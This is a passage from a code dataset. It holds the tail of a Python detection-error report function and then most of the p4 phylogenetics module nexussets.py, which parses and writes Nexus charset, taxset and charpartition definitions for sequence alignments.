print ('Detection Analysis:')
print (' Number of detections: {}'.format(num_dets))
print (' Number of objects: {}'.format(num_objs))
print (' Percentage of correct detections: {}'.format(
num_correct/num_dets))
print (' Percentage of localization error: {}'.format(
num_loc_error/num_dets))
print (' Percentage of classification error: {}'.format(
num_cls_error/num_dets))
print (' Percentage of background error: {}'.format(
num_bg_error/num_dets))
print (' Percentage of repeated detections: {}'.format(
num_repeated_error/num_dets))
print (' Recall: {}'.format(
num_detected_obj/num_objs))
out = {}
out['num of detections'] = num_dets
out['num of objects'] = num_objs
out['% correct detections'] = num_correct/num_dets
out['% localization error'] = num_loc_error/num_dets
out['% classification error'] = num_cls_error/num_dets
out['% background error'] = num_bg_error/num_dets
out['% repeated error'] = num_repeated_error/num_dets
out['% recall'] = num_detected_obj/num_objs
return out
| bsd-2-clause | -1,532,657,115,107,445,500 | 33.743243 | 82 | 0.550661 | false |
blaiseli/p4-phylogenetics | p4/nexussets.py | 1 | 69575 | import os
import sys
import string
import array
import types
import copy
from var import var
# Don't bother with NexusToken2, cuz sets blocks are small
from nexustoken import nexusSkipPastNextSemiColon, safeNextTok
import func
from p4exceptions import P4Error
# [Examples from the paup manual,
# but note the bad charpartition subset names '1' and '2'. P4 would not allow those names.]
# charset coding = 2-457 660-896;
# charset noncoding = 1 458-659 897-898;
# charpartition gfunc = 1:coding, 2:noncoding;
# Notes from MadSwofMad97.
# TaxSet taxset-name [({Standard | Vector})] = taxon-set; # standard is default
# TaxPartition partition-name [([{[No]Tokens}] # tokens is default
# [{standard|vector}])] # standard is default
# = subset-name:taxon-set [, subset-name:taxon-set...];
# eg TaxSet outgroup=1-4;
# TaxSet beetles=Omma-.;
#
# taxpartition populations=1:1-3, 2:4-6, 3:7 8; # note bad taxpartition names 1, 2, 3
# taxpartition populations (vector notokens) = 11122233;
#
class CaseInsensitiveDict(dict):
"""A dictionary that is case insensitive, for Nexus"""
def __init__(self, default=None):
dict.__init__(self)
self.default = default
#self.keyDict = {}
def __setitem__(self, key, val):
if type(key) != types.StringType:
gm = ["CaseInsensitiveDict()"]
gm.append("The key must be a string. Got '%s'" % key)
raise P4Error(gm)
lowKey = string.lower(key)
dict.__setitem__(self, lowKey, val)
#self.keyDict[string.lower(key)] = key
def __getitem__(self, key):
if type(key) != types.StringType:
gm = ["CaseInsensitiveDict()"]
gm.append("The key must be a string. Got '%s'" % key)
raise P4Error(gm)
lowKey = string.lower(key)
try:
return dict.__getitem__(self, lowKey)
except KeyError:
return self.default
def get(self, key, *args):
if not args:
args = (self.default,)
return dict.get(self, key, *args)
#########################################################################
# CLASS NexusSets
#########################################################################
class NexusSets(object):
"""A container for Nexus CharSet, CharPartition, and TaxSet objects.
When the first Nexus sets block is read, a NexusSets object is
made and saved as ``var.nexusSets``. ``CharSet``, ``TaxSet``, and
``CharPartition`` objects are placed in it, as they are
read/created. TaxPartition commands are not implemented. Here is
a simple nexus sets block that only has charsets::
#nexus
begin sets;
charset pos1 = 1-.\\3;
charset pos2 = 2-.\\3;
charset pos3 = 3-.\\3;
end;
To get the third positions only, you could say::
read('myAlignment.phy')
a = var.alignments[0]
read('mySets.nex') # the sets block above
b = a.subsetUsingCharSet('pos3')
What happens above when the mySets.nex file is read is that a
NexusSets object is created as ``var.nexusSets`` and populated
with the three charsets as CharSet objects. Then when you asked
for a subset, a copy of that NexusSets object was made and applied
to the alignment.
Notice that the length of the alignment is not part of the
information in the sets block, and so things remain undefined
in ``var.nexusSets`` until the nexus sets are applied to a
particular alignment. One consequence of this somewhat awkward
system is that the same charsets could then be applied to another
alignment of a different size::
read('myAlignment.phy')
aA = var.alignments[0]
read('anotherAlignment.nex')
aB = var.alignments[1]
read('mySets.nex') # the sets block above
bA = aA.subsetUsingCharSet('pos3')
bB = aB.subsetUsingCharSet('pos3')
In the above example, ``bA.nexusSets`` and ``bB.nexusSets`` are
both derived from ``var.nexusSets`` but are independent of it, and
different from each other.
So when an Alignment (or Tree object) wants to use ``var.nexusSets``, it
makes a copy of it, and attaches the copy as
theAlignment.nexusSets or theTree.nexusSets
Here is another example, including a ``charPartition`` definition::
begin sets;
charset gene1 = 1-213;
charset gene2 = 214-497;
charPartition cpName = gene1:gene1, gene2:gene2;
end;
For an alignment, you can then set a **character partition** by ::
a.setCharPartition(cpName)
Do this *before* you make a Data object, to partition the alignment.
You can also use charsets to extract subsets, eg via::
b = a.subsetUsingCharSet(csName)
Setting a charPartition or asking for a subset will trigger
applying ``var.nexusSets`` to the alignment, but you can also do
it explicitly, by::
myTree.setNexusSets()
NexusSets knows about predefined 'constant', 'gapped', and
'remainder' charsets. It does not know about 'missambig' or
'uninf' charsets.
NexusSets can either be in the default standard format or in
vector format -- you can change them to vector format with the ::
mySet.vectorize()
method, and you can change them to standard format with the ::
mySet.standardize()
method. For taxSets, you can use actual tax names (rather than
numbers or ranges) by invoking the method::
myTaxSet.setUseTaxNames()
which sets the attribute 'useTaxNames' to True, and puts the
taxNames for the taxSet in the ::
taxSet.taxNames
list, which might be handy.
You can see the current state of a NexusSets object using ::
myNexusSets.dump()
It can also be written out as a nexus sets block. If an Alignment object
has a ``nexusSets`` attribute then if you ask the alignment to write
itself to a nexus file then the Alignment.nexusSets is also
written. If you would rather it not be written, delete it first.
If you would rather it be written to a separate file, do that
first and then delete it.
One nice thing about taxsets is that :meth:`Tree.Tree.tv` and
:meth:`Tree.Tree.btv` know about them and can display them.
"""
def __init__(self):
self.charSets = []
self.charSetsDict = CaseInsensitiveDict()
self.charSetLowNames = []
self.taxSets = []
self.taxSetsDict = CaseInsensitiveDict()
self.taxSetLowNames = []
self.charPartitions = []
self.charPartitionsDict = CaseInsensitiveDict()
self.charPartitionLowNames = []
self.charPartition = None
#self.alignment = None
self.aligNChar = None
self.taxNames = []
self.nTax = None
self.predefinedCharSetLowNames = ['constant', 'gapped']
# The nexus format defines several "predefined" charSets.
# For all datatypes:
# constant
# gapped
# missambig
# remainder
# uninf
# I only have implemented 2-- constant and gapped. The
# 'remainder' charSet is handled by p4, but not as a CharSet
# object, since its content depends on the context.
cS = CharSet(self)
cS.num = -1
cS.name = 'constant'
cS.lowName = 'constant'
cS.format = 'vector'
# self.charSets.append(cS)
self.constant = cS
self.charSetsDict['constant'] = self.constant
cS = CharSet(self)
cS.num = -1
cS.name = 'gapped'
cS.lowName = 'gapped'
cS.format = 'vector'
# self.charSets.append(cS)
self.gapped = cS
self.charSetsDict['gapped'] = self.gapped
def _continueReadingFromNexusFile(self, flob):
gm = ['NexusSets._continueReadingFromNexusFile()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
if 0:
print gm[0]
print ' var.nexus_doFastNextTok = %s' % var.nexus_doFastNextTok
nexusSkipPastNextSemiColon(flob)
commandName = safeNextTok(flob, gm[0])
lowCommandName = string.lower(commandName)
# print 'got lowCommandName = %s' % lowCommandName
while lowCommandName not in [None, 'end', 'endblock']:
# print "Got lowCommandName '%s'" % lowCommandName
if lowCommandName == 'charset':
self._readCharSetCommand(flob)
elif lowCommandName == 'charpartition':
self._readCharPartitionCommand(flob)
elif lowCommandName == 'taxset':
self._readTaxSetCommand(flob)
elif lowCommandName == 'taxpartition':
print
print gm[0]
if len(gm) > 1:
print gm[1]
print " Sorry-- taxpartition is not implemented."
nexusSkipPastNextSemiColon(flob)
else:
gm.append("Got unrecognized sets block command '%s'" %
commandName)
raise P4Error(gm)
commandName = safeNextTok(
flob, 'NexusSets.continueReadingFromNexusFile()')
lowCommandName = string.lower(commandName)
def _readCharSetCommand(self, flob):
# We have just read 'charset'. The next thing we expect is the charset
# name.
gm = ['NexusSets._readCharSetCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(
safeNextTok(flob, 'NexusSets: _readCharSetCommand'))
# print "readCharSetCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad charSet name '%s'" % name)
raise P4Error(gm)
# Check for duped names
if lowName in self.charSetLowNames:
gm.append("Duplicated charSet name '%s'" % name)
raise P4Error(gm)
elif lowName in self.predefinedCharSetLowNames:
gm.append(
"You cannot use the name '%s' -- it is predefined." % name)
raise P4Error(gm)
cs = CharSet(self)
cs.name = name
cs.lowName = lowName
cs.readTaxOrCharSetDefinition(flob)
cs.num = len(self.charSets)
self.charSets.append(cs)
self.charSetsDict[name] = cs
self.charSetLowNames.append(cs.lowName)
def _readTaxSetCommand(self, flob):
# We have just read 'taxset'. The next thing we expect is the taxset
# name.
gm = ['NexusSets._readTaxSetCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(
safeNextTok(flob, 'NexusSets: readTaxSetCommand'))
# print "readTaxSetCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad taxSet name '%s'" % name)
raise P4Error(gm)
# Check for duped names
if lowName in self.taxSetLowNames:
gm.append("Duplicated taxSet name '%s'" % name)
raise P4Error(gm)
ts = TaxSet(self)
ts.name = name
ts.lowName = lowName
ts.readTaxOrCharSetDefinition(flob)
ts.num = len(self.taxSets)
self.taxSets.append(ts)
self.taxSetsDict[name] = ts
self.taxSetLowNames.append(ts.lowName)
def _readCharPartitionCommand(self, flob):
gm = ['NexusSets._readCharPartitionCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
# print "readCharPartitionCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad charPartition name '%s'" % name)
if lowName in self.charPartitionLowNames:
gm.append("Duplicated charPartition name '%s'" % name)
raise P4Error(gm)
cp = CharPartition(self)
cp.name = name
cp.lowName = lowName
cp._readCharPartitionDefinition(flob)
self.charPartitions.append(cp)
self.charPartitionsDict[name] = cp
self.charPartitionLowNames.append(cp.lowName)
def dump(self):
print " NexusSets dump"
if self.constant:
print " Predefined char set 'constant'"
self.constant.dump()
if self.gapped:
print " Predefined char set 'gapped'"
self.gapped.dump()
print " There are %i non-predefined char sets" % len(self.charSets)
for cs in self.charSets:
cs.dump()
print " There are %i tax sets" % len(self.taxSets)
for ts in self.taxSets:
ts.dump()
print " There are %i char partitions" % len(self.charPartitions)
for cp in self.charPartitions:
cp.dump()
if self.charPartition:
print " self.charPartition.name is %s" % func.nexusFixNameIfQuotesAreNeeded(self.charPartition.name)
else:
print " There is no self.charPartition"
def write(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexus(self, fName=None):
"""Write self in Nexus format to stdout or a file."""
if fName:
f = file(fName, 'w')
else:
f = sys.stdout
f.write('#nexus\n\n')
self.writeNexusToOpenFile(f)
if fName:
f.close()
def writeNexusToOpenFile(self, flob):
"""This only writes non-trivial stuff.
Ie if self has only constant and gapped charsets, then it does
not write anything."""
if self.charSets or self.charPartitions or self.taxSets:
flob.write('begin sets;\n')
for cs in self.charSets:
cs.writeNexusToOpenFile(flob)
for cp in self.charPartitions:
cp.writeNexusToOpenFile(flob)
for ts in self.taxSets:
ts.writeNexusToOpenFile(flob)
flob.write('end;\n\n')
def newCharSet(self, name, mask=None):
cs = CharSet(self)
cs.name = name
cs.name = name.lower()
cs.num = len(self.charSets)
if mask:
cs.format = 'vector'
cs.mask = mask
else:
pass
self.charSets.append(cs)
self.charSetsDict[cs.name] = cs
def dupeCharSet(self, existingCharSetName, newName):
theCS = self.charSetsDict.get(existingCharSetName)
if not theCS:
raise P4Error(
"NexusSets.dupeCharSet() -- can't find char set '%s'" % existingCharSetName)
cs = CharSet(self)
cs.name = newName
cs.name = newName.lower()
cs.num = len(self.charSets)
self.charSets.append(cs)
self.charSetsDict[cs.name] = cs
cs.format = theCS.format
cs.triplets = copy.deepcopy(theCS.triplets) # its a list of lists
cs.tokens = theCS.tokens[:]
cs.mask = theCS.mask
cs.aligNChar = theCS.aligNChar
class TaxOrCharSet(object):
def __init__(self, theNexusSets):
self.nexusSets = theNexusSets
self.num = -1
self.name = None
self.lowName = None
self._format = 'standard' # or 'vector' So it should be a property.
self.triplets = []
self.tokens = []
self.mask = None
self.className = 'TaxOrCharSet'
self.lowTaxNames = []
self.taxNames = []
self.useTaxNames = None # undecided
def _getFormat(self):
return self._format
def _setFormat(self, newFormat):
assert newFormat in ['standard', 'vector']
self._format = newFormat
format = property(_getFormat, _setFormat)
def dump(self):
print " %s %i" % (self.className, self.num)
print " name: %s" % self.name
if hasattr(self, 'aligNChar'):
print " aligNChar: %s" % self.aligNChar
print " format: %s" % self.format
if hasattr(self, 'useTaxNames'):
print " useTaxNames: %s" % self.useTaxNames
print " triplets: "
for t in self.triplets:
print " %s" % t
if hasattr(self, 'numberTriplets'):
print " numberTriplets: "
for t in self.numberTriplets:
print " %s" % t
print " tokens: %s" % self.tokens
print " mask: %s" % self.mask
if self.mask:
print " mask 1s-count: %s" % self.mask.count('1')
def readTaxOrCharSetDefinition(self, flob):
gm = ['%s.readTaxSetDefinition()' % self.className]
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
tok = safeNextTok(flob, gm[0])
lowTok = string.lower(tok)
# print "readTaxSetDefinition: get tok '%s'" % tok
if lowTok == '=':
pass
elif lowTok == '(':
#['standard', 'vector']:
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
if lowTok == 'standard':
pass
elif lowTok == 'vector':
self.format = 'vector'
else:
gm.append("Unexpected '%s'" % tok)
gm.append("(I was expecting either 'standard' or")
gm.append("'vector' following the parenthesis.)")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
if tok == ')':
pass
else:
gm.append("Unexpected '%s'" % tok)
gm.append(
"(I was expecting an unparentheis after '%s')" % self.format)
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
if tok != '=':
gm.append("Unexpected '%s'" % tok)
gm.append("I was expecting an '=' after '(%s)'" % self.format)
raise P4Error(gm)
else:
gm.append("Unexpected '%s'" % tok)
raise P4Error(gm)
# Now we are on the other side of the '='
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok not in [None, ';', 'end', 'endblock']:
self.tokens.append(tok)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
if self.format == 'vector':
self.mask = string.join(self.tokens, '')
self.tokens = []
for i in range(len(self.mask)):
if self.mask[i] not in ['0', '1']:
gm.append("%s '%s', vector format" %
(self.className, self.name))
gm.append("The vector must be all zeros or ones.")
raise P4Error(gm)
# print self.mask
# do a once-over sanity check, and convert integer strings to ints
# print "xx1 self.tokens is now %s" % self.tokens
for tokNum in range(len(self.tokens)):
tok = self.tokens[tokNum]
lowTok = string.lower(tok)
if lowTok in ['.', 'all', '-', '\\']:
pass
elif self.className == 'CharSet' and lowTok in self.nexusSets.charSetLowNames:
# print " xx3 %s is an existing charSet" % tok
pass
elif self.className == 'CharSet' and lowTok in self.nexusSets.predefinedCharSetLowNames:
# print " xx3 %s is a pre-defined charSet" % tok
pass
elif self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames:
# print " xx4 %s is an existing taxSet" % tok
pass
else:
# print " xx5"
try:
intTok = int(tok)
self.tokens[tokNum] = intTok
except ValueError:
if self.className == 'TaxSet':
pass
elif self.className == 'CharSet':
gm.append("I don't understand the token '%s'" % tok)
raise P4Error(gm)
# Now I want to make a list of triplets representing eg 23-87\3
# first item = 23, second item = 87, third = 3
# not all will exist for each part of the char definition.
tokNum = 0
self.triplets = []
while tokNum < len(self.tokens):
tok = self.tokens[tokNum]
# print "Considering tok[%i] '%s'" % (tokNum, tok)
if type(tok) == type('str'):
lowTok = string.lower(tok)
else:
lowTok = None
if self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames or \
self.className == 'charSet' and lowTok in self.nexusSets.charSetLowNames:
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"An existing tax or char set may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"An existing tax or char set may not be followed by a '\\'")
raise P4Error(gm)
elif tok == 'all':
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set 'all' may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set 'all' may not be followed by a '\\'")
raise P4Error(gm)
elif tok == '-':
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Out of place '-'")
raise P4Error(gm)
elif tok == '\\':
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Out of place '\\'")
raise P4Error(gm)
elif tok == '.':
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set '.' may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set '.' may not be followed by a '\\'")
raise P4Error(gm)
elif type(tok) == type(1) or type(tok) == type('str'):
aTriplet = [tok, None, None]
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
tokNum += 1
if tokNum < len(self.tokens):
# maybe '.'
if type(self.tokens[tokNum]) == type('str'):
aTriplet[1] = self.tokens[tokNum]
elif type(self.tokens[tokNum]) == type(1):
if type(aTriplet[0]) == type(1):
if self.tokens[tokNum] > aTriplet[0]:
aTriplet[1] = self.tokens[tokNum]
else:
gm.append(
"%s '%s' definition" % (self.className, self.name))
gm.append(
"If a range is defined by two numbers,")
# gm.append("(as it appears to be -- %s %s %s)" % (
# aTriplet[0], aTriplet[1],
# aTriplet[2]))
gm.append(
"the second number of a range must be bigger than")
gm.append("the first.")
raise P4Error(gm)
else:
aTriplet[1] = self.tokens[tokNum]
else:
raise P4Error(gm)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '\\':
tokNum += 1
if tokNum < len(self.tokens):
if type(self.tokens[tokNum]) == type(1):
aTriplet[2] = self.tokens[tokNum]
else:
gm.append(
"%s '%s' definition" % (self.className, self.name))
gm.append(
"Step value of a range must be a number")
gm.append("(Got '%s')" %
self.tokens[tokNum])
raise P4Error(gm)
tokNum += 1
self.triplets.append(aTriplet)
# print "xxy self.mask = %s" % self.mask
if not self.triplets and not self.mask:
if not var.allowEmptyCharSetsAndTaxSets:
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Got no definition (no triplets or mask)")
gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on)")
raise P4Error(gm)
if 0:
print gm[0]
print " Got self.triplets %s" % self.triplets
def setMask(self):
"""Set self.mask."""
gm = ["%s.setMask() name='%s'" % (self.className, self.name)]
if self.format == 'vector':
if self.mask:
pass
else:
gm.append("vector format, but no mask?")
raise P4Error(gm)
elif self.format == 'standard':
if 0:
print gm[0]
self.dump()
if not len(self.triplets):
if not var.allowEmptyCharSetsAndTaxSets:
gm.append(
"standard format, but we have no triplets? - no definition?")
gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on.)")
raise P4Error(gm)
if self.className == 'CharSet':
thisMaskLen = self.aligNChar
existingSetNames = self.nexusSets.charSetLowNames
existingSets = self.nexusSets.charSets
theTriplets = self.triplets
elif self.className == 'TaxSet':
thisMaskLen = self.nexusSets.nTax
existingSetNames = self.nexusSets.taxSetLowNames
existingSets = self.nexusSets.taxSets
theTriplets = self.numberTriplets
mask = array.array('c', thisMaskLen * '0')
for aTriplet in theTriplets:
if 0:
print gm[0]
print " '%s' aTriplet=%s" % (self.name, aTriplet)
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
lowFirst = None
lowSecond = None
if type(first) == type('str'):
lowFirst = string.lower(first)
if type(second) == type('str'):
lowSecond = string.lower(second)
# its a single, or an existing set, not a range
if first and not second:
if lowFirst:
if lowFirst == 'all':
for i in range(thisMaskLen):
mask[i] = '1'
if lowFirst in existingSetNames:
for aSet in existingSets:
if lowFirst == aSet.lowName:
if not aSet.mask:
aSet.setMask()
for j in range(thisMaskLen):
if aSet.mask[j] == '1':
mask[j] = '1'
# Maybe its a predefined charset --- constant or gapped
elif self.className == 'CharSet' and lowFirst in self.nexusSets.predefinedCharSetLowNames:
aSet = None
if lowFirst == 'constant':
aSet = self.nexusSets.constant
elif lowFirst == 'gapped':
aSet = self.nexusSets.gapped
assert aSet
for j in range(thisMaskLen):
if aSet.mask[j] == '1':
mask[j] = '1'
else:
gm.append("I don't know '%s'" % first)
raise P4Error(gm)
elif first == '.':
mask[-1] = '1'
elif type(first) == type(1):
if first > 0 and first <= thisMaskLen:
mask[first - 1] = '1'
else:
# This will have been checked before.
gm.append(
"Component '%s' is out of range of mask len (%s)" % (first, thisMask))
raise P4Error(gm)
elif first and second:
# Its a range.
start = int(first)
if second == '.':
fin = len(mask)
else:
fin = int(second)
if third:
bystep = int(third)
# print "mask len %i, start-1 %i, fin %i, bystep %i" %
# (len(mask), (start-1), fin, bystep)
for spot in range(start - 1, fin, bystep):
mask[spot] = '1'
else:
for spot in range(start - 1, fin):
mask[spot] = '1'
# print " finished incorporating triplet %s into
# '%s' mask." % (aTriplet, self.name)
mask = mask.tostring()
# print "Got char set '%s' mask '%s'" % (self.name, mask)
self.mask = mask
def invertMask(self):
"""Change zeros to ones, and non-zeros to zero."""
gm = ['%s.invertMask()' % self.className]
if not self.mask:
self.dump()
gm.append("The charset has no mask")
raise P4Error(gm)
self.mask = list(self.mask)
for i in range(len(self.mask)):
if self.mask[i] == '0':
self.mask[i] = '1'
else:
self.mask[i] = '0'
self.mask = string.join(self.mask, '')
def write(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexus(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexusToOpenFile(self, flob):
if self.className == 'CharSet':
theSetName = 'charSet'
else:
theSetName = 'taxSet'
if self.format == 'standard':
flob.write(' %s %s =' % (theSetName, self.name))
if self.useTaxNames:
for tN in self.taxNames:
flob.write(" %s" % func.nexusFixNameIfQuotesAreNeeded(tN))
else:
# for i in self.tokens:
# flob.write(' %s' % i)
previousTok = None
for theTok in self.tokens:
if type(theTok) == types.StringType:
if theTok not in ['-', '\\']:
tok = func.nexusFixNameIfQuotesAreNeeded(theTok)
else:
tok = theTok
else:
tok = theTok
if previousTok != None:
# tokens will be either ints or strings
previousType = type(previousTok)
# print "previousTok = %s, previousType = %s" %
# (previousTok, previousType)
# usually put in a space
if type(tok) == previousType:
# except in this case
if tok in ['-'] or previousTok in ['-']:
flob.write('%s' % tok)
else:
flob.write(' %s' % tok)
else: # usually no space
if tok in ['-'] or previousTok in ['-']:
flob.write('%s' % tok)
else: # except in this case
flob.write(' %s' % tok)
previousTok = tok
# print "previousTok = %s, previousType = %s" %
# (previousTok, previousType)
else:
flob.write(' %s' % tok)
previousTok = tok
flob.write(';\n')
elif self.format == 'vector':
flob.write(' %s %s (vector) = ' % (theSetName, self.name))
flob.write('%s;\n' % self.mask)
def vectorize(self):
if self.format == 'vector':
return
if not self.mask:
self.setMask()
#self.triplets = []
#self.tokens = []
self.format = 'vector'
def standardize(self):
if self.format == 'standard':
return
self.triplets = []
self.tokens = []
thisTriplet = []
for mPos in range(len(self.mask)):
# print "mPos=%i mask=%s thisTriplet=%s" % (mPos,
# self.mask[mPos], thisTriplet)
if self.mask[mPos] == '0':
if thisTriplet:
if thisTriplet[0] == mPos:
thisTriplet.append(None)
thisTriplet.append(None)
else:
thisTriplet.append(mPos)
thisTriplet.append(None)
# print " finished triplet -- %s" % thisTriplet
self.triplets.append(thisTriplet)
thisTriplet = []
else:
if thisTriplet:
pass
else:
thisTriplet.append(mPos + 1)
# print " started triplet -- %s" % thisTriplet
if thisTriplet:
if thisTriplet[0] == len(self.mask):
thisTriplet.append(None)
thisTriplet.append(None)
else:
thisTriplet.append(mPos + 1)
thisTriplet.append(None)
# print " finished last triplet -- %s" % thisTriplet
self.triplets.append(thisTriplet)
# print self.triplets
for triplet in self.triplets:
if triplet[1] == None:
self.tokens.append(triplet[0])
else:
self.tokens.append(triplet[0])
self.tokens.append('-')
self.tokens.append(triplet[1])
self.format = 'standard'
# self.dump()
class CharSet(TaxOrCharSet):
def __init__(self, theNexusSets):
TaxOrCharSet.__init__(self, theNexusSets)
self.className = 'CharSet'
self.aligNChar = None
def getNChar(self):
self.setMask()
return self.mask.count('1')
def setAligNChar(self, aligNChar):
gm = ['CharSet.setAligNChar()']
# print "CharSet name=%s, format=%s, aligNChar=%i" % (self.name,
# self.format, aligNChar)
self.aligNChar = aligNChar
if self.format == 'standard':
for aTriplet in self.triplets:
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
if first and not second: # its a single
if type(first) == type(1):
if first > 0 and first <= self.aligNChar:
pass
else:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Charset definition element '%s' is out of range" % first)
gm.append("(aligNChar = %i)" % self.aligNChar)
raise P4Error(gm)
pass
elif first and second: # its a range
try:
start = int(first)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % first)
raise P4Error(gm)
if second == '.':
fin = self.aligNChar
else:
try:
fin = int(second)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % second)
raise P4Error(gm)
if third:
try:
bystep = int(third)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % third)
raise P4Error(gm)
elif self.format == 'vector':
# print "charset %s, vector format %s, mask %s" % (self.name,
# self.format, self.mask)
if self.mask:
if len(self.mask) == self.aligNChar:
pass
else:
gm.append("len(self.mask) is %i, but aligNChar is %i" % (
len(self.mask), self.aligNChar))
raise P4Error(gm)
else:
gm.append("bad format %s" % self.format)
raise P4Error(gm)
class TaxSet(TaxOrCharSet):
def __init__(self, theNexusSets):
TaxOrCharSet.__init__(self, theNexusSets)
self.className = 'TaxSet'
self.numberTriplets = []
def setNumberTriplets(self):
gm = ['TaxSet.setNumberTriplets()']
if not self.nexusSets.lowTaxNames:
self.nexusSets.lowTaxNames = [
string.lower(txName) for txName in self.nexusSets.taxNames]
self.numberTriplets = []
# print "self.triplets = %s" % self.triplets
for tr in self.triplets:
# print "setNumberTriplets() tr=%s" % tr
numTr = []
for itemNum in range(2):
trItem = tr[itemNum]
# print " considering '%s'" % trItem
if trItem == None:
numTr.append(trItem)
elif type(trItem) == type(1):
numTr.append(trItem)
elif trItem == '.':
numTr.append(self.nexusSets.nTax)
else:
assert type(trItem) == type('str')
lowTrItem = string.lower(trItem)
if lowTrItem in self.nexusSets.taxSetLowNames:
numTr.append(trItem)
else:
if lowTrItem not in self.nexusSets.lowTaxNames:
gm.append("Triplet %s" % tr)
gm.append(
"'%s' is a string, but not in the taxNames." % trItem)
raise P4Error(gm)
theIndx = self.nexusSets.lowTaxNames.index(lowTrItem)
theIndx += 1
numTr.append(theIndx)
trItem = tr[2]
if trItem == None:
numTr.append(None)
else:
assert type(trItem) == type(1)
numTr.append(trItem)
assert len(numTr) == 3
# print numTr
first = numTr[0]
# first might be a pre-existing taxSet name
if type(first) == type('str'):
pass
else:
second = numTr[1]
assert type(first) == type(1) and first != 0
if type(second) == type(1):
assert second != 0
if second <= first:
gm.append("Triplet %s" % tr)
gm.append("Triplet expressed as numbers. %s" % numTr)
gm.append(
"This appears to be a range, but the second number")
gm.append("is not bigger than the first.")
raise P4Error(gm)
assert second <= self.nexusSets.nTax
assert first <= self.nexusSets.nTax
self.numberTriplets.append(numTr)
def setUseTaxNames(self):
if self.useTaxNames:
return
# if not self.mask:
# self.setMask()
if not self.taxNames:
for pos in range(len(self.mask)):
c = self.mask[pos]
if c == '1':
self.taxNames.append(self.nexusSets.taxNames[pos])
self.useTaxNames = True
class CharPartitionSubset(object):
def __init__(self):
self.name = None
self.lowName = None
self.tokens = []
self.mask = None
self.triplets = []
def dump(self):
print " -- CharPartitionSubset"
print " name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name)
print " triplets: "
for t in self.triplets:
print " %s" % t
print " tokens: %s" % self.tokens
# for t in self.tokens:
# print " %s" % t
print " mask: %s" % self.mask
def writeNexusToOpenFile(self, flob):
flob.write('%s:' % self.name)
# print self.tokens
# for i in self.tokens:
# flob.write(' %s' % i)
previousTok = None
for i in self.tokens:
if previousTok != None:
# tokens will be either ints or strings
previousType = type(previousTok)
# print "previousTok = %s, previousType = %s" % (previousTok,
# previousType)
if type(i) == previousType: # put in a space
flob.write(' %s' % i)
else: # no space
flob.write('%s' % i)
previousTok = i
else:
flob.write(' %s' % i)
previousTok = i
class CharPartition(object):
def __init__(self, theNexusSets):
self.nexusSets = theNexusSets
self.name = None
self.lowName = None
self.tokens = []
self.subsets = []
def _readCharPartitionDefinition(self, flob):
gm = ['CharPartition._readCharPartitionDefinition()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok != '=':
if lowTok == '(':
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
